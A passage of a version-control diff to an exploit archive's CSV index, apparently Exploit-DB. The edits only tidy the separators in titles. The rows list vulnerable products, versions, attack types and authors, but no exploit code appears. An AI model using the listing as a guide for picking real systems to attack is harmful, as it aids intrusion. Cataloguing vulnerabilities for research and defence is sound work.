Scripting",2009-12-17,loneferret,java,webapps,0 34594,platforms/windows/remote/34594.rb,"ManageEngine Desktop Central StatusUpdate Arbitrary File Upload",2014-09-09,Metasploit,windows,remote,8020 34347,platforms/cgi/webapps/34347.txt,"iOffice 0.1 - 'parametre' Parameter Remote Command Execution",2010-07-18,"Marshall Whittaker",cgi,webapps,0 34348,platforms/linux/dos/34348.txt,"OpenLDAP 2.4.22 - ('modrdn' Request) Multiple Vulnerabilities",2010-07-19,"Ilkka Mattila",linux,dos,0 @@ -30991,7 +30991,7 @@ id,file,description,date,author,platform,type,port 34498,platforms/php/webapps/34498.txt,"ViArt Helpdesk forum.php forum_id Parameter XSS",2009-08-10,Moudi,php,webapps,0 34399,platforms/ios/remote/34399.txt,"Air Transfer Iphone 1.3.9 - Multiple Vulnerabilities",2014-08-24,"Samandeep Singh",ios,remote,0 34400,platforms/php/webapps/34400.txt,"RaidenTunes 'music_out.php' Cross-Site Scripting",2014-08-03,LiquidWorm,php,webapps,0 -34401,platforms/php/webapps/34401.txt,"PHP168 Template Editor 'filename' Parameter Directory Traversal",2009-10-04,esnra,php,webapps,0 +34401,platforms/php/webapps/34401.txt,"PHP168 Template Editor - 'filename' Parameter Directory Traversal",2009-10-04,esnra,php,webapps,0 34402,platforms/php/webapps/34402.txt,"OpenSolution Quick.Cart - Local File Inclusion / Cross-Site Scripting",2009-10-08,kl3ryk,php,webapps,0 34403,platforms/windows/dos/34403.pl,"Quick 'n Easy FTP Server 3.9.1 USER Command Remote Buffer Overflow",2010-07-22,demonalex,windows,dos,0 34404,platforms/windows/dos/34404.pl,"K-Meleon 1.x URI Handling Multiple Denial of Service Vulnerabilities",2010-08-04,Lostmon,windows,dos,0 @@ -31011,7 +31011,7 @@ id,file,description,date,author,platform,type,port 34420,platforms/cgi/webapps/34420.txt,"VTLS Virtua InfoStation.cgi - SQL Injection",2014-08-26,"José Tozo",cgi,webapps,80 34421,platforms/linux/local/34421.c,"glibc - Off-by-One NUL Byte gconv_translit_find Exploit",2014-08-27,"taviso and scarybeasts",linux,local,0 34526,platforms/php/webapps/34526.pl,"vBulletin 4.0.x < 4.1.2 (search.php cat param) - SQL Injection Exploit",2014-09-03,D35m0nd142,php,webapps,80 -34426,platforms/linux/remote/34426.txt,"uzbl \'uzbl-core\' \'@SELECTED_URI\' Mouse Button Bindings Command Injection",2010-08-05,Chuzz,linux,remote,0 +34426,platforms/linux/remote/34426.txt,"uzbl 'uzbl-core' - '@SELECTED_URI' Mouse Button Bindings Command Injection",2010-08-05,Chuzz,linux,remote,0 34427,platforms/linux/dos/34427.txt,"OpenSSL - 'ssl3_get_key_exchange()' Use-After-Free Memory Corruption",2010-08-07,"Georgi Guninski",linux,dos,0 34424,platforms/php/webapps/34424.txt,"WooCommerce Store Exporter 1.7.5 - Multiple XSS Vulnerabilities",2014-08-27,"Mike Manzotti",php,webapps,0 34428,platforms/windows/dos/34428.py,"Quintessential Media Player 5.0.121 - (.m3u) Buffer Overflow",2010-08-09,"Abhishek Lyall",windows,dos,0 @@ -31048,8 +31048,8 @@ id,file,description,date,author,platform,type,port 34461,platforms/multiple/remote/34461.py,"NRPE 2.15 - Remote Code Execution",2014-08-29,"Claudio Viviani",multiple,remote,0 34462,platforms/windows/remote/34462.txt,"Microsoft Windows Kerberos - 'Pass The Ticket' Replay Security Bypass",2010-08-13,"Emmanuel Bouillon",windows,remote,0 34463,platforms/windows/dos/34463.py,"HTML Help Workshop 1.4 - (SEH) Buffer Overflow",2014-08-29,"Moroccan Kingdom (MKD)",windows,dos,0 -34464,platforms/php/webapps/34464.txt,"SyntaxCMS 'rows_per_page' Parameter SQL Injection",2010-08-10,"High-Tech Bridge SA",php,webapps,0 -34467,platforms/php/webapps/34467.txt,"Edit-X PHP CMS 'search_text' Parameter Cross-Site Scripting",2010-08-13,"High-Tech Bridge SA",php,webapps,0 +34464,platforms/php/webapps/34464.txt,"SyntaxCMS - 'rows_per_page' Parameter SQL Injection",2010-08-10,"High-Tech Bridge SA",php,webapps,0 +34467,platforms/php/webapps/34467.txt,"Edit-X PHP CMS - 'search_text' Parameter Cross-Site Scripting",2010-08-13,"High-Tech Bridge SA",php,webapps,0 34468,platforms/php/webapps/34468.html,"Mystic 0.1.4 - Multiple Cross-Site Scripting Vulnerabilities",2010-08-10,"High-Tech Bridge SA",php,webapps,0 34469,platforms/php/webapps/34469.html,"Onyx Multiple Cross-Site Scripting Vulnerabilities",2010-08-10,"High-Tech Bridge SA",php,webapps,0 34470,platforms/php/webapps/34470.txt,"Beex news.php navaction Parameter XSS",2009-09-01,Moudi,php,webapps,0 @@ -31065,9 +31065,9 @@ id,file,description,date,author,platform,type,port 34480,platforms/windows/dos/34480.py,"Xilisoft Video Converter 3.1.8.0720b - (.ogg) Buffer Overflow",2010-08-16,"Praveen Darshanam",windows,dos,0 34481,platforms/php/webapps/34481.txt,"123 Flash Chat - Multiple Security Vulnerabilities",2010-08-16,Lincoln,php,webapps,0 34482,platforms/php/webapps/34482.txt,"TurnkeyForms Yahoo Answers Clone 'questiondetail.php' Cross-Site Scripting",2009-08-10,Moudi,php,webapps,0 -34483,platforms/php/webapps/34483.txt,"Nasim Guest Book 'page' Parameter Cross-Site Scripting",2010-08-10,Moudi,php,webapps,0 +34483,platforms/php/webapps/34483.txt,"Nasim Guest Book - 'page' Parameter Cross-Site Scripting",2010-08-10,Moudi,php,webapps,0 34484,platforms/php/webapps/34484.txt,"Joomla! 'com_dirfrm' Component Multiple SQL Injection",2010-08-18,Hieuneo,php,webapps,0 -34485,platforms/php/webapps/34485.txt,"FreeSchool 'key_words' Parameter Cross-Site Scripting",2009-10-14,"drunken danish rednecks",php,webapps,0 +34485,platforms/php/webapps/34485.txt,"FreeSchool - 'key_words' Parameter Cross-Site Scripting",2009-10-14,"drunken danish rednecks",php,webapps,0 34486,platforms/php/webapps/34486.txt,"PHPCMS2008 - 'download.php' Information Disclosure",2009-10-19,Securitylab.ir,php,webapps,0 34487,platforms/php/webapps/34487.txt,"Facil Helpdesk kbase/kbase.php URI XSS",2009-08-07,Moudi,php,webapps,0 34489,platforms/windows/local/34489.py,"HTML Help Workshop 1.4 - Local Buffer Overflow Exploit (SEH)",2014-08-31,mr.pr0n,windows,local,0 @@ -31158,7 +31158,7 @@ id,file,description,date,author,platform,type,port 34596,platforms/php/webapps/34596.txt,"Pligg CMS 1.0.4 - SQL Injection / Cross-Site Scripting",2010-09-03,"Bogdan Calin",php,webapps,0 34597,platforms/php/webapps/34597.txt,"Datetopia Buy Dating Site Cross-Site Scripting",2010-09-10,Moudi,php,webapps,0 34598,platforms/php/webapps/34598.txt,"SZNews 2.7 - 'printnews.php3' Remote File Inclusion",2009-09-11,"kurdish hackers team",php,webapps,0 -34599,platforms/php/webapps/34599.txt,"tourismscripts HotelBook 'hotel_id' Parameter Multiple SQL Injection",2009-09-10,Mr.SQL,php,webapps,0 +34599,platforms/php/webapps/34599.txt,"tourismscripts HotelBook - 'hotel_id' Parameter Multiple SQL Injection",2009-09-10,Mr.SQL,php,webapps,0 34600,platforms/php/webapps/34600.txt,"Match Agency BiZ edit_profile.php important Parameter XSS",2009-09-11,Moudi,php,webapps,0 34601,platforms/php/webapps/34601.txt,"Match Agency BiZ report.php pid Parameter XSS",2009-09-11,Moudi,php,webapps,0 34602,platforms/windows/dos/34602.html,"Microsoft Internet Explorer 7/8 CSS Handling Cross Domain Information Disclosure",2010-09-06,"Chris Evans",windows,dos,0 @@ -31192,10 +31192,10 @@ id,file,description,date,author,platform,type,port 34630,platforms/php/webapps/34630.txt,"AChecker 1.0 - 'uri' Parameter Cross-Site Scripting",2010-09-15,"High-Tech Bridge SA",php,webapps,0 34631,platforms/php/webapps/34631.txt,"ATutor 1.0 - Multiple 'cid' Parameter Cross-Site Scripting Vulnerabilities",2010-09-15,"High-Tech Bridge SA",php,webapps,0 34632,platforms/php/webapps/34632.txt,"Multi Website 1.5 - 'search' Parameter HTML Injection",2009-08-06,"599eme Man",php,webapps,0 -34633,platforms/php/webapps/34633.txt,"Spiceworks 'query' Parameter Cross-Site Scripting",2009-08-08,"Adam Baldwin",php,webapps,0 +34633,platforms/php/webapps/34633.txt,"Spiceworks - 'query' Parameter Cross-Site Scripting",2009-08-08,"Adam Baldwin",php,webapps,0 34634,platforms/php/webapps/34634.txt,"Multple I-Escorts Products - 'escorts_search.php' Cross-Site Scripting",2010-09-15,"599eme Man",php,webapps,0 34635,platforms/php/webapps/34635.txt,"Willscript Auction Website Script 'category.php' SQL Injection",2009-08-06,"599eme Man",php,webapps,0 -34636,platforms/php/webapps/34636.txt,"NWS-Classifieds 'cmd' Parameter Local File Inclusion",2010-09-15,"John Leitch",php,webapps,0 +34636,platforms/php/webapps/34636.txt,"NWS-Classifieds - 'cmd' Parameter Local File Inclusion",2010-09-15,"John Leitch",php,webapps,0 34639,platforms/php/webapps/34639.txt,"CMScout IBrowser TinyMCE Plugin 2.3.4.3 - Local File Inclusion",2010-09-15,"John Leitch",php,webapps,0 34640,platforms/php/webapps/34640.txt,"Mollify 1.6 - 'index.php' Cross-Site Scripting",2010-09-15,"John Leitch",php,webapps,0 34641,platforms/php/webapps/34641.py,"chillyCMS 2.3.4.3 - Arbitrary File Upload",2010-09-15,"John Leitch",php,webapps,0 @@ -31246,7 +31246,7 @@ id,file,description,date,author,platform,type,port 34689,platforms/php/webapps/34689.txt,"Smart Magician Blog 1.0 - Multiple SQL Injection",2009-08-27,Evil-Cod3r,php,webapps,0 34690,platforms/php/webapps/34690.txt,"@Mail 6.1.9 - 'MailType' Parameter Cross-Site Scripting",2010-09-21,"Vicente Aguilera Diaz",php,webapps,0 34691,platforms/multiple/remote/34691.txt,"CollabNet Subversion Edge Log Parser - HTML Injection",2010-09-21,"Sumit Kumar Soni",multiple,remote,0 -34692,platforms/php/webapps/34692.txt,"WebAsyst Shop-Script PREMIUM 'searchstring' Parameter Cross-Site Scripting",2009-07-27,u.f.,php,webapps,0 +34692,platforms/php/webapps/34692.txt,"WebAsyst Shop-Script PREMIUM - 'searchstring' Parameter Cross-Site Scripting",2009-07-27,u.f.,php,webapps,0 34693,platforms/php/webapps/34693.txt,"Free Arcade Script 1.0 - 'search' Field Cross-Site Scripting",2009-08-27,"599eme Man",php,webapps,0 34694,platforms/php/webapps/34694.txt,"ClipBucket 1.7.1 - Multiple SQL Injection",2009-07-24,Qabandi,php,webapps,0 34695,platforms/windows/remote/34695.c,"GreenBrowser - 'RSRC32.DLL' DLL Loading Arbitrary Code Execution",2010-09-22,anT!-Tr0J4n,windows,remote,0 @@ -31300,7 +31300,7 @@ id,file,description,date,author,platform,type,port 34743,platforms/php/webapps/34743.txt,"Proxy List Script 'index.php' Cross-Site Scripting",2009-07-20,Moudi,php,webapps,0 34744,platforms/php/webapps/34744.txt,"YourFreeWorld Ultra Classifieds listads.php Multiple Parameter XSS",2009-07-20,Moudi,php,webapps,0 34745,platforms/php/webapps/34745.txt,"YourFreeWorld Ultra Classifieds subclass.php cname Parameter XSS",2009-07-20,Moudi,php,webapps,0 -34746,platforms/php/webapps/34746.txt,"Web TV 'chn' Parameter Cross-Site Scripting",2009-07-20,Moudi,php,webapps,0 +34746,platforms/php/webapps/34746.txt,"Web TV - 'chn' Parameter Cross-Site Scripting",2009-07-20,Moudi,php,webapps,0 34747,platforms/php/webapps/34747.txt,"LittleSite 0.1 - 'file' Parameter Local File Inclusion",2014-09-23,Eolas_Gadai,php,webapps,0 34748,platforms/php/webapps/34748.txt,"Classified Linktrader Script 'addlink.php' SQL Injection",2009-07-21,Moudi,php,webapps,0 34749,platforms/php/webapps/34749.txt,"CJ Dynamic Poll Pro 2.0 - 'admin_index.php' Cross-Site Scripting",2009-07-21,Moudi,php,webapps,0 @@ -31324,7 +31324,7 @@ id,file,description,date,author,platform,type,port 34769,platforms/php/webapps/34769.txt,"MySITE - SQL Injection / Cross-Site Scripting",2010-09-27,MustLive,php,webapps,0 34770,platforms/php/webapps/34770.txt,"PHP Scripts Now Hangman index.php n Parameter SQL Injection",2009-07-21,Moudi,php,webapps,0 34771,platforms/php/webapps/34771.txt,"PHP Scripts Now Hangman index.php letters Parameter XSS",2009-07-21,Moudi,php,webapps,0 -34772,platforms/php/webapps/34772.txt,"Honest Traffic 'msg' Parameter Cross-Site Scripting",2009-07-17,Moudi,php,webapps,0 +34772,platforms/php/webapps/34772.txt,"Honest Traffic - 'msg' Parameter Cross-Site Scripting",2009-07-17,Moudi,php,webapps,0 34773,platforms/php/webapps/34773.txt,"Horde IMP Webmail 4.3.7 - 'fetchmailprefs.php' HTML Injection",2010-09-27,"Moritz Naumann",php,webapps,0 34774,platforms/php/webapps/34774.txt,"Hotscripts Type PHP Clone Script feedback.php msg Parameter XSS",2009-08-21,Moudi,php,webapps,0 34775,platforms/php/webapps/34775.txt,"Hotscripts Type PHP Clone Script index.php msg Parameter XSS",2009-08-21,Moudi,php,webapps,0 @@ -31384,7 +31384,7 @@ id,file,description,date,author,platform,type,port 34842,platforms/php/webapps/34842.txt,"TWiki 5.0 bin/view rev Parameter XSS",2010-10-14,"DOUHINE Davy",php,webapps,0 34843,platforms/php/webapps/34843.txt,"TWiki 5.0 bin/login Multiple Parameter XSS",2010-10-14,"DOUHINE Davy",php,webapps,0 34844,platforms/windows/remote/34844.c,"STDU Explorer 1.0.201 - 'dwmapi.dll' DLL Loading Arbitrary Code Execution",2010-10-15,anT!-Tr0J4n,windows,remote,0 -34845,platforms/php/webapps/34845.txt,"PHP Photo Vote 1.3F 'page' Parameter Cross-Site Scripting",2009-08-07,Moudi,php,webapps,0 +34845,platforms/php/webapps/34845.txt,"PHP Photo Vote 1.3F - 'page' Parameter Cross-Site Scripting",2009-08-07,Moudi,php,webapps,0 34846,platforms/windows/remote/34846.txt,"httpdx 1.4.5 dot Character Remote File Disclosure",2009-10-09,Dr_IDE,windows,remote,0 34847,platforms/php/webapps/34847.txt,"PHP Easy Shopping Cart 3.1R 'subitems.php' Cross-Site Scripting",2009-08-07,Moudi,php,webapps,0 34848,platforms/windows/remote/34848.c,"1CLICK DVD Converter 2.1.7.1 - Multiple DLL Loading Arbitrary Code Execution Vulnerabilities",2010-10-15,anT!-Tr0J4n,windows,remote,0 @@ -31411,9 +31411,9 @@ id,file,description,date,author,platform,type,port 34870,platforms/windows/remote/34870.html,"VLC Media Player 1.1.4 Mozilla Multimedia Plugin - Remote Code Execution",2010-10-19,shinnai,windows,remote,0 34871,platforms/php/webapps/34871.txt,"eCardMAX FormXP 'survey_result.php' Cross-Site Scripting",2009-07-15,Moudi,php,webapps,0 34872,platforms/windows/dos/34872.py,"MASS PLAYER 2.1 File Processing Remote Denial of Service",2010-10-19,Sweet,windows,dos,0 -34873,platforms/php/webapps/34873.txt,"Wap-motor 'image' Parameter Directory Traversal",2009-08-27,Inj3ct0r,php,webapps,0 +34873,platforms/php/webapps/34873.txt,"Wap-motor - 'image' Parameter Directory Traversal",2009-08-27,Inj3ct0r,php,webapps,0 34874,platforms/php/webapps/34874.txt,"SkyBlueCanvas 1.1 r237 - 'admin.php' Multiple Cross-Site Scripting Vulnerabilities",2009-10-15,MaXe,php,webapps,0 -34875,platforms/php/webapps/34875.txt,"QuarkMail 'tf' Parameter Directory Traversal",2009-08-28,Securitylab.ir,php,webapps,0 +34875,platforms/php/webapps/34875.txt,"QuarkMail - 'tf' Parameter Directory Traversal",2009-08-28,Securitylab.ir,php,webapps,0 34876,platforms/php/webapps/34876.txt,"E-Gold Game Series: Pirates of The Caribbean Multiple SQL Injection",2009-08-27,Moudi,php,webapps,0 34877,platforms/php/webapps/34877.txt,"DigiOz Guestbook 1.7.2 - 'search.php' Cross-Site Scripting",2009-08-26,Moudi,php,webapps,0 34878,platforms/php/webapps/34878.txt,"StandAloneArcade 1.1 - 'gamelist.php' Cross-Site Scripting",2009-08-27,Moudi,php,webapps,0 @@ -31464,11 +31464,11 @@ id,file,description,date,author,platform,type,port 34928,platforms/jsp/webapps/34928.txt,"DrayTek VigorACS SI 1.3.0 - Multiple Vulnerabilities",2014-10-09,"Digital Misfits",jsp,webapps,0 34929,platforms/multiple/webapps/34929.txt,"Nessus Web UI 2.3.3 - Stored XSS",2014-10-09,"Frank Lycops",multiple,webapps,0 34930,platforms/php/webapps/34930.txt,"Sitecore CMS 6.0.0 rev. 090120 - 'default.aspx' Cross-Site Scripting",2009-06-03,intern0t,php,webapps,0 -34931,platforms/windows/remote/34931.c,"Microsoft Windows VISTA 'lpksetup.exe' 'oci.dll' DLL Loading Arbitrary Code Execution",2010-10-25,"Tyler Borland",windows,remote,0 +34931,platforms/windows/remote/34931.c,"Microsoft Windows VISTA - 'lpksetup.exe' 'oci.dll' DLL Loading Arbitrary Code Execution",2010-10-25,"Tyler Borland",windows,remote,0 34932,platforms/linux/remote/34932.html,"NitroView ESM 'ess.pm' Remote Command Execution",2010-10-26,s_n,linux,remote,0 34933,platforms/php/webapps/34933.txt,"FlatNux 2009-03-27 - Multiple Cross-Site Scripting Vulnerabilities",2009-06-03,intern0t,php,webapps,0 34934,platforms/php/webapps/34934.pl,"Joomla! Projects 'com_projects' Component SQL Injection and Local File Inclusion",2010-10-27,jos_ali_joe,php,webapps,0 -34935,platforms/php/webapps/34935.txt,"LES PACKS 'ID' Parameter SQL Injection",2010-10-27,Cru3l.b0y,php,webapps,0 +34935,platforms/php/webapps/34935.txt,"LES PACKS - 'ID' Parameter SQL Injection",2010-10-27,Cru3l.b0y,php,webapps,0 34936,platforms/asp/webapps/34936.txt,"i-Gallery 3.4/4.1 - 'streamfile.asp' Multiple Directory Traversal Vulnerabilities",2009-06-03,"Stefano Angaran",asp,webapps,0 34937,platforms/php/webapps/34937.txt,"Feindura CMS Groupware Multiple Local File Inclusion and Cross-Site Scripting Vulnerabilities",2010-10-28,Justanotherhacker.com,php,webapps,0 34938,platforms/windows/dos/34938.txt,"Teamspeak 2.0.32.60 Memory Corruption",2010-10-28,"Jokaim and nSense",windows,dos,0 @@ -31516,7 +31516,7 @@ id,file,description,date,author,platform,type,port 34985,platforms/php/remote/34985.txt,"pfSense 2 Beta 4 - 'graph.php' Multiple Cross-Site Scripting Vulnerabilities",2010-11-05,"dave b",php,remote,0 34986,platforms/hardware/remote/34986.txt,"D-Link DIR-300 - Multiple Security Bypass Vulnerabilities",2010-11-09,"Karol Celia",hardware,remote,0 34987,platforms/linux/local/34987.c,"Linux Kernel 2.6.x - 'net/core/filter.c' Local Information Disclosure",2010-11-09,"Dan Rosenberg",linux,local,0 -34988,platforms/php/webapps/34988.txt,"PHPShop 2.1 EE 'name_new' Parameter Cross-Site Scripting",2010-11-10,MustLive,php,webapps,0 +34988,platforms/php/webapps/34988.txt,"PHPShop 2.1 EE - 'name_new' Parameter Cross-Site Scripting",2010-11-10,MustLive,php,webapps,0 34989,platforms/php/webapps/34989.txt,"WeBid 0.85P1 - Multiple Input Validation Vulnerabilities",2010-11-10,"John Leitch",php,webapps,0 34990,platforms/php/webapps/34990.txt,"Ricoh Web Image Monitor 2.03 - Cross-Site Scripting",2010-11-09,thelightcosine,php,webapps,0 34996,platforms/php/webapps/34996.txt,"Raised Eyebrow CMS 'venue.php' SQL Injection",2010-11-16,Cru3l.b0y,php,webapps,0 @@ -31528,7 +31528,7 @@ id,file,description,date,author,platform,type,port 35000,platforms/windows/dos/35000.txt,"SAP Netweaver Enqueue Server - Denial of Service",2014-10-17,"Core Security",windows,dos,3200 35001,platforms/windows/remote/35001.txt,"SAP NetWeaver 7.0 SQL Monitor Multiple Cross-Site Scripting Vulnerabilities",2010-11-17,a.polyakov,windows,remote,0 35002,platforms/windows/remote/35002.html,"VLC Media Player 1.1.x Calling Convention Remote Buffer Overflow",2010-11-02,shinnai,windows,remote,0 -35003,platforms/multiple/remote/35003.txt,"IBM OmniFind 'command' Parameter Cross-Site Scripting",2010-11-09,"Fatih Kilic",multiple,remote,0 +35003,platforms/multiple/remote/35003.txt,"IBM OmniFind - 'command' Parameter Cross-Site Scripting",2010-11-09,"Fatih Kilic",multiple,remote,0 35004,platforms/php/webapps/35004.txt,"CompactCMS 1.4.1 - Multiple Cross-Site Scripting Vulnerabilities (1)",2010-11-18,"High-Tech Bridge SA",php,webapps,0 35005,platforms/windows/remote/35005.html,"WebKit Insufficient Entropy Random Number Generator Weakness (1)",2010-11-18,"Amit Klein",windows,remote,0 35006,platforms/windows/remote/35006.html,"WebKit Insufficient Entropy Random Number Generator Weakness (2)",2010-11-18,"Amit Klein",windows,remote,0 @@ -31547,7 +31547,7 @@ id,file,description,date,author,platform,type,port 35020,platforms/win_x86/local/35020.rb,"MS14-060 Microsoft Windows OLE Package Manager Code Execution",2014-10-20,Metasploit,win_x86,local,0 35021,platforms/linux/local/35021.rb,"Linux PolicyKit - Race Condition Privilege Escalation",2014-10-20,Metasploit,linux,local,0 35025,platforms/php/webapps/35025.html,"Car Portal 2.0 - 'car_make' Parameter Cross-Site Scripting",2010-11-29,"Underground Stockholm",php,webapps,0 -35026,platforms/php/webapps/35026.txt,"Joomla Store Directory 'id' Parameter SQL Injection",2010-11-30,XroGuE,php,webapps,0 +35026,platforms/php/webapps/35026.txt,"Joomla Store Directory - 'id' Parameter SQL Injection",2010-11-30,XroGuE,php,webapps,0 35027,platforms/php/webapps/35027.txt,"E-lokaler CMS 2 Admin Login Multiple SQL Injection",2010-11-26,ali_err0r,php,webapps,0 35028,platforms/php/webapps/35028.txt,"SmartBox - 'page_id' Parameter SQL Injection",2010-11-26,KnocKout,php,webapps,0 35032,platforms/windows/remote/35032.rb,"Numara / BMC Track-It! FileStorageService Arbitrary File Upload",2014-10-21,Metasploit,windows,remote,0 @@ -31611,9 +31611,9 @@ id,file,description,date,author,platform,type,port 35085,platforms/cgi/webapps/35085.txt,"WWWThread 5.0.8 Pro 'showflat.pl' Cross-Site Scripting",2010-12-09,"Aliaksandr Hartsuyeu",cgi,webapps,0 35086,platforms/multiple/dos/35086.rb,"Allegro RomPager 4.07 - UPnP HTTP Request Remote Denial of Service",2010-12-08,"Ricky-Lee Birtles",multiple,dos,0 35087,platforms/php/webapps/35087.txt,"net2ftp 0.98 - (stable) 'admin1.template.php' Local File Inclusion / Remote File Inclusion",2010-12-09,"Marcin Ressel",php,webapps,0 -35088,platforms/php/webapps/35088.txt,"PHP State 'id' Parameter SQL Injection",2010-12-09,jos_ali_joe,php,webapps,0 -35089,platforms/php/webapps/35089.txt,"Joomla Jeformcr 'id' Parameter SQL Injection",2010-12-09,FL0RiX,php,webapps,0 -35090,platforms/php/webapps/35090.txt,"JExtensions Property Finder Component for Joomla! 'sf_id' Parameter SQL Injection",2010-12-10,FL0RiX,php,webapps,0 +35088,platforms/php/webapps/35088.txt,"PHP State - 'id' Parameter SQL Injection",2010-12-09,jos_ali_joe,php,webapps,0 +35089,platforms/php/webapps/35089.txt,"Joomla Jeformcr - 'id' Parameter SQL Injection",2010-12-09,FL0RiX,php,webapps,0 +35090,platforms/php/webapps/35090.txt,"JExtensions Property Finder Component for Joomla! - 'sf_id' Parameter SQL Injection",2010-12-10,FL0RiX,php,webapps,0 35091,platforms/php/webapps/35091.txt,"ManageEngine EventLog Analyzer 6.1 - Multiple Cross-Site Scripting Vulnerabilities",2010-12-10,"Rob Kraus",php,webapps,0 35092,platforms/multiple/remote/35092.html,"Helix Server 14.0.1.571 Administration Interface Cross-Site Request Forgery",2010-12-10,"John Leitch",multiple,remote,0 35093,platforms/cgi/webapps/35093.txt,"BizDir 05.10 - 'f_srch' Parameter Cross-Site Scripting",2010-12-10,"Aliaksandr Hartsuyeu",cgi,webapps,0 @@ -31646,15 +31646,15 @@ id,file,description,date,author,platform,type,port 35119,platforms/windows/remote/35119.txt,"Alt-N WebAdmin 3.3.3 - Remote Source Code Information Disclosure",2010-12-17,wsn1983,windows,remote,0 35120,platforms/php/webapps/35120.txt,"Radius Manager 3.6 - Multiple Cross-Site Scripting Vulnerabilities",2010-12-17,"Rodrigo Rubira Branco",php,webapps,0 35121,platforms/php/webapps/35121.txt,"Social Share Multiple Cross-Site Scripting Vulnerabilities",2010-12-17,"Aliaksandr Hartsuyeu",php,webapps,0 -35122,platforms/php/webapps/35122.txt,"Social Share 'postid' Parameter SQL Injection",2010-12-20,"Aliaksandr Hartsuyeu",php,webapps,0 +35122,platforms/php/webapps/35122.txt,"Social Share - 'postid' Parameter SQL Injection",2010-12-20,"Aliaksandr Hartsuyeu",php,webapps,0 35123,platforms/php/webapps/35123.txt,"Mafya Oyun Scrpti 'profil.php' SQL Injection",2010-12-20,"DeadLy DeMon",php,webapps,0 35124,platforms/php/webapps/35124.txt,"FreeNAS 0.7.2.5543 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2010-12-21,db.pub.mail,php,webapps,0 -35125,platforms/php/webapps/35125.txt,"Openfiler 'device' Parameter Cross-Site Scripting",2010-12-21,db.pub.mail,php,webapps,0 +35125,platforms/php/webapps/35125.txt,"Openfiler - 'device' Parameter Cross-Site Scripting",2010-12-21,db.pub.mail,php,webapps,0 35126,platforms/php/webapps/35126.txt,"Habari 0.6.5 - Multiple Cross-Site Scripting Vulnerabilities",2010-12-21,"High-Tech Bridge SA",php,webapps,0 35128,platforms/hardware/webapps/35128.txt,"ZTE Modem ZXDSL 531BIIV7.3.0f_D09_IN - Stored XSS",2014-10-31,"Ravi Rajput",hardware,webapps,0 35129,platforms/php/webapps/35129.txt,"Who's Who Script - CSRF Exploit (Add Admin Account)",2014-10-31,"ZoRLu Bugrahan",php,webapps,0 35130,platforms/windows/remote/35130.txt,"Calibre 0.7.34 - Cross-Site Scripting / Directory Traversal",2010-12-21,waraxe,windows,remote,0 -35131,platforms/php/webapps/35131.txt,"Social Share 'username' Parameter SQL Injection",2010-12-21,"Aliaksandr Hartsuyeu",php,webapps,0 +35131,platforms/php/webapps/35131.txt,"Social Share - 'username' Parameter SQL Injection",2010-12-21,"Aliaksandr Hartsuyeu",php,webapps,0 35132,platforms/linux/remote/35132.txt,"Mitel Audio and Web Conferencing (AWC) Remote Arbitrary Shell Command Injection",2010-12-21,"Jan Fry",linux,remote,0 35133,platforms/php/webapps/35133.txt,"Mediatricks Viva Thumbs Plugin for WordPress - Multiple Information Disclosure Vulnerabilities",2010-12-21,"Richard Brain",php,webapps,0 35134,platforms/php/webapps/35134.txt,"ImpressCMS 1.2.x - 'quicksearch_ContentContent' Parameter HTML Injection",2010-12-21,"High-Tech Bridge SA",php,webapps,0 @@ -31665,8 +31665,8 @@ id,file,description,date,author,platform,type,port 35212,platforms/php/webapps/35212.txt,"XCloner WordPress/Joomla! Plugin - Multiple Vulnerabilities",2014-11-10,"Larry W. Cashdollar",php,webapps,80 35140,platforms/php/webapps/35140.txt,"MyBB 1.6 - search.php keywords Parameter SQL Injection",2010-12-23,"Aung Khant",php,webapps,0 35141,platforms/php/webapps/35141.txt,"MyBB 1.6 - private.php keywords Parameter SQL Injection",2010-12-23,"Aung Khant",php,webapps,0 -35142,platforms/php/webapps/35142.txt,"Social Share 'search' Parameter Cross-Site Scripting",2010-12-23,"Aliaksandr Hartsuyeu",php,webapps,0 -35143,platforms/php/webapps/35143.txt,"HotWeb Scripts HotWeb Rentals 'PageId' Parameter SQL Injection",2010-12-28,"non customers",php,webapps,0 +35142,platforms/php/webapps/35142.txt,"Social Share - 'search' Parameter Cross-Site Scripting",2010-12-23,"Aliaksandr Hartsuyeu",php,webapps,0 +35143,platforms/php/webapps/35143.txt,"HotWeb Scripts HotWeb Rentals - 'PageId' Parameter SQL Injection",2010-12-28,"non customers",php,webapps,0 35144,platforms/multiple/remote/35144.txt,"Appweb Web Server 3.2.2-1 - Cross-Site Scripting",2010-12-23,"Gjoko Krstic",multiple,remote,0 35145,platforms/php/webapps/35145.txt,"Pligg CMS 1.1.3 - 'range' Parameter SQL Injection",2010-12-27,Dr.NeT,php,webapps,0 35146,platforms/php/webapps/35146.txt,"PHP < 5.6.2 - Bypass disable_functions Exploit (Shellshock)",2014-11-03,"Ryan King (Starfall)",php,webapps,0 @@ -31893,11 +31893,11 @@ id,file,description,date,author,platform,type,port 35398,platforms/multiple/remote/35398.pl,"KMPlayer 2.9.3.1214 - (.ksf) Remote Buffer Overflow",2011-02-28,KedAns-Dz,multiple,remote,0 35399,platforms/windows/remote/35399.pl,"DivX Player 6.x - (.dps) Remote Buffer Overflow",2011-02-28,KedAns-Dz,windows,remote,0 35400,platforms/php/webapps/35400.txt,"BackWPup Plugin 1.4 for WordPress - Multiple Information Disclosure Vulnerabilities",2011-02-28,"Danilo Massa",php,webapps,0 -35401,platforms/php/webapps/35401.txt,"SnapProof 'retPageID' Parameter Cross-Site Scripting",2011-02-28,"difficult 511",php,webapps,0 +35401,platforms/php/webapps/35401.txt,"SnapProof - 'retPageID' Parameter Cross-Site Scripting",2011-02-28,"difficult 511",php,webapps,0 35402,platforms/php/webapps/35402.txt,"Forritun Multiple SQL Injection",2011-03-02,eXeSoul,php,webapps,0 35403,platforms/linux/dos/35403.c,"Linux Kernel 2.6.x - epoll Nested Structures Local DoS",2011-03-02,"Nelson Elhage",linux,dos,0 35404,platforms/linux/dos/35404.c,"Linux Kernel 2.6.x - fs/eventpoll.c epoll Data Structure File Descriptor Local DoS",2011-03-02,"Nelson Elhage",linux,dos,0 -35405,platforms/php/webapps/35405.txt,"VidiScript 'vp' Parameter Cross-Site Scripting",2011-03-02,NassRawI,php,webapps,0 +35405,platforms/php/webapps/35405.txt,"VidiScript - 'vp' Parameter Cross-Site Scripting",2011-03-02,NassRawI,php,webapps,0 35406,platforms/php/webapps/35406.txt,"Support Incident Tracker (SiT!) 3.62 - Multiple Cross-Site Scripting Vulnerabilities",2011-03-03,"AutoSec Tools",php,webapps,0 